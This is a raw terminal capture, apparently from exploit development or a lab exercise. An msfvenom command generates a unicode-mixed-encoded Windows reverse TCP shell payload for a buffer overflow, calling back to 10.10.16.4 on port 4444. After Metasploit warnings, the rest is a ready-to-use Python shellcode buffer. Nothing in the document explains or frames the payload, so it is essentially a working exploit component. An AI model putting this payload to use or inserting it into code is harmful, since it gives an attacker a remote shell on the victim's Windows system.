msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x6b\x4c\x6b\x38\x32\x62"
buf += b"\x69\x70\x4d\x30\x6b\x50\x31\x50\x32\x69\x79\x55\x6d"
buf += b"\x61\x69\x30\x72\x44\x74\x4b\x32\x30\x4c\x70\x52\x6b"
buf += b"\x4e\x72\x6a\x6c\x44\x4b\x6e\x72\x6c\x54\x64\x4b\x64"
buf += b"\x32\x6d\x58\x5a\x6f\x47\x47\x6e\x6a\x6f\x36\x50\x31"
buf += b"\x6b\x4f\x54\x6c\x6d\x6c\x6f\x71\x71\x6c\x6b\x52\x6c"
buf += b"\x6c\x4b\x70\x56\x61\x68\x4f\x6a\x6d\x79\x71\x79\x37"
buf += b"\x4b\x32\x4b\x42\x6e\x72\x32\x37\x72\x6b\x4e\x72\x4c"
buf += b"\x50\x54\x4b\x50\x4a\x6d\x6c\x72\x6b\x70\x4c\x6e\x31"
buf += b"\x70\x78\x47\x73\x6d\x78\x6b\x51\x56\x71\x6f\x61\x44"
buf += b"\x4b\x30\x59\x6f\x30\x39\x71\x69\x43\x74\x4b\x31\x39"
buf += b"\x4a\x78\x58\x63\x6d\x6a\x4d\x79\x74\x4b\x50\x34\x72"
buf += b"\x6b\x79\x71\x6a\x36\x30\x31\x79\x6f\x76\x4c\x49\x31"
buf += b"\x68\x4f\x7a\x6d\x4a\x61\x67\x57\x6d\x68\x59\x50\x34"
buf += b"\x35\x6c\x36\x59\x73\x53\x4d\x6c\x38\x6d\x6b\x31\x6d"
buf += b"\x6d\x54\x54\x35\x67\x74\x51\x48\x72\x6b\x61\x48\x6d"
buf += b"\x54\x69\x71\x59\x43\x42\x46\x64\x4b\x6a\x6c\x6e\x6b"
buf += b"\x62\x6b\x6e\x78\x6d\x4c\x6a\x61\x49\x43\x62\x6b\x59"
buf += b"\x74\x54\x4b\x59\x71\x58\x50\x53\x59\x30\x44\x4b\x74"
buf += b"\x6b\x74\x4f\x6b\x4f\x6b\x63\x31\x71\x49\x61\x4a\x30"
buf += b"\x51\x4b\x4f\x4b\x30\x4f\x6f\x4f\x6f\x4f\x6a\x72\x6b"
buf += b"\x6e\x32\x58\x6b\x42\x6d\x51\x4d\x51\x58\x50\x33\x6d"
buf += b"\x62\x69\x70\x79\x70\x33\x38\x62\x57\x71\x63\x70\x32"
buf += b"\x31\x4f\x70\x54\x63\x38\x70\x4c\x30\x77\x4f\x36\x59"
buf += b"\x77\x6b\x4f\x37\x65\x55\x68\x44\x50\x6d\x31\x79\x70"
buf += b"\x49\x70\x6b\x79\x67\x54\x72\x34\x62\x30\x30\x68\x6e"
buf += b"\x49\x55\x30\x30\x6b\x39\x70\x49\x6f\x47\x65\x70\x50"
buf += b"\x4e\x70\x6e\x70\x30\x50\x31\x30\x42\x30\x31\x30\x4e"
buf += b"\x70\x42\x48\x78\x6a\x5a\x6f\x59\x4f\x37\x70\x79\x6f"
buf += b"\x57\x65\x72\x77\x31\x5a\x6a\x65\x70\x68\x6b\x5a\x6c"
buf += b"\x4a\x6a\x70\x59\x74\x53\x38\x59\x72\x4b\x50\x5a\x71"
buf += b"\x61\x4c\x64\x49\x79\x56\x32\x4a\x6e\x30\x70\x56\x42"
buf += b"\x37\x4f\x78\x44\x59\x35\x55\x34\x34\x51\x51\x4b\x4f"
buf += b"\x36\x75\x61\x75\x35\x70\x51\x64\x4a\x6c\x79\x6f\x30"
buf += b"\x4e\x4b\x58\x70\x75\x68\x6c\x72\x48\x7a\x50\x46\x55"
buf += b"\x45\x52\x61\x46\x69\x6f\x69\x45\x61\x58\x70\x63\x62"
buf += b"\x4d\x32\x44\x79\x70\x73\x59\x37\x73\x4e\x77\x6f\x67"
buf += b"\x50\x57\x6c\x71\x69\x66\x62\x4a\x4b\x62\x4e\x79\x62"
buf += b"\x36\x7a\x42\x4b\x4d\x72\x46\x35\x77\x4e\x64\x4d\x54"
buf += b"\x6d\x6c\x6a\x61\x5a\x61\x74\x4d\x61\x34\x6f\x34\x4e"
buf += b"\x30\x66\x66\x69\x70\x6d\x74\x30\x54\x4e\x70\x6e\x76"
buf += b"\x32\x36\x6e\x76\x71\x36\x4e\x76\x30\x4e\x72\x36\x72"
buf += b"\x36\x72\x33\x62\x36\x6f\x78\x32\x59\x46\x6c\x6d\x6f"
buf += b"\x65\x36\x49\x6f\x68\x55\x44\x49\x57\x70\x6e\x6e\x52"
buf += b"\x36\x30\x46\x39\x6f\x4c\x70\x73\x38\x6c\x48\x44\x47"
buf += b"\x6b\x6d\x61\x50\x79\x6f\x46\x75\x55\x6b\x5a\x50\x65"
buf += b"\x65\x77\x32\x32\x36\x30\x68\x76\x46\x32\x75\x45\x6d"
buf += b"\x43\x6d\x79\x6f\x47\x65\x4f\x4c\x39\x76\x61\x6c\x59"
buf += b"\x7a\x71\x70\x39\x6b\x4b\x30\x42\x55\x69\x75\x55\x6b"
buf += b"\x61\x37\x6c\x53\x51\x62\x70\x6f\x31\x5a\x39\x70\x52"
buf += b"\x33\x69\x6f\x49\x45\x41\x41"
